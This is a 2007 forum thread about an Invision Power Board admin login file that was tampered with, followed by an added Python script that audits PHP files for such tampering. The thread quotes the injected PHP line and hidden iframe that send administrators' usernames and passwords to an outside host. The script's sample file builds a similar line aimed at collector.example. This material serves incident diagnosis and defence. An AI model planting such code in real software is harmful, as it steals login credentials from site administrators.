jdtate78 Posted May 22, 2007

Hello,

I have a client, more a friend actually, who has an IPB 2.2 install. Anyway, he contacted me as he couldn't get into his ACP; it just hung and did not redirect. He didn't have time to wait for support or anything, so I took a look.

Upon submitting admin login details I found the browser attempting to connect to this site, http://zybez.ath.cx, particularly a PHP file called connector.php at this URL: http://zybez.ath.cx/connector.php. When I looked at the source code I found the following:

<script>window.stuats='';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=http://site.com/ipbforum&user=administrator&pass=PASSWORDREMOVED\"></div>

As you can see, it looks like this exploit is sending admin login details straight to the hacker's website.

After doing some more poking around in the IPB files I found the following code in sources/action_admin/login.php on line 226:

$connector = '<script>window.stuats=\'\';</script><div style="display:none"><iframe src="http://zybez.ath.cx/connector.php?site=' . htmlentities($this->ipsclass->vars['board_url']) . '&user=' . htmlentities($this->ipsclass->input['username']) . '&pass=' . htmlentities($this->ipsclass->input['password']) . '\"></div>';

I'm guessing this code isn't part of the original IPB files?

Once the code was removed all was well.

Bye
bfarber Posted May 22, 2007

Would mean the "hacker" had direct access to the file code - either via FTP, or by being hosted on the same server, and security settings being lax (open_basedir off, file chmod 777, etc.).

This is not a support forum, however, I'm afraid. Your friend will need to submit a ticket for support.
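Added example, not part of the original thread and not IPB code: a small Python audit that walks a forum install and flags the two things discussed above, PHP lines that read the submitted username/password while embedding a URL to a host outside an allow-list, and PHP files left world-writable (chmod 777). The function names, the sample files and the host collector.example are constructed for illustration, and the match is a single-line heuristic, so treat hits as leads to review rather than proof.

```python
import os
import re
import stat
import tempfile
from urllib.parse import urlparse

# Heuristic, single-line only: a concatenation split across several lines
# would need a wider matching window than this example uses.
URL_RE = re.compile(r"https?://[^\s'\"<>\\]+", re.I)
CRED_RE = re.compile(r"input\[\s*['\"](?:username|password)['\"]\s*\]", re.I)

def scan_line(line, allowed_hosts=()):
    """Return off-site hosts named on a line that also reads login input."""
    if not CRED_RE.search(line):
        return []
    hosts = {urlparse(u).hostname for u in URL_RE.findall(line)}
    return sorted(h for h in hosts if h and h not in allowed_hosts)

def scan_tree(root, allowed_hosts=()):
    """Walk root; return (relative path, line number, reason) findings."""
    findings = []
    for dirpath, _dirs, names in os.walk(root):
        for name in sorted(n for n in names if n.endswith(".php")):
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if os.stat(path).st_mode & stat.S_IWOTH:  # e.g. chmod 777
                findings.append((rel, 0, "world-writable"))
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    for host in scan_line(line, allowed_hosts):
                        findings.append((rel, lineno, "login input sent to " + host))
    return findings

def build_demo(root):
    """Write constructed sample files (not taken from a real IPB install)."""
    samples = {
        "index.php": ("<?php\n$u = $this->ipsclass->input['username'];\n", 0o644),
        "login.php": ("<?php\n$connector = '<iframe src=\"http://collector.example/c.php"
                      "?pass=' . htmlentities($this->ipsclass->input['password']) . '\">';\n", 0o777),
    }
    for name, (body, mode) in samples.items():
        path = os.path.join(root, name)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
        os.chmod(path, mode)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo(tmp)
        print(*scan_tree(tmp), sep="\n")
```

Pass the board's own hostname and any other expected hosts as allowed_hosts so legitimate links are not reported.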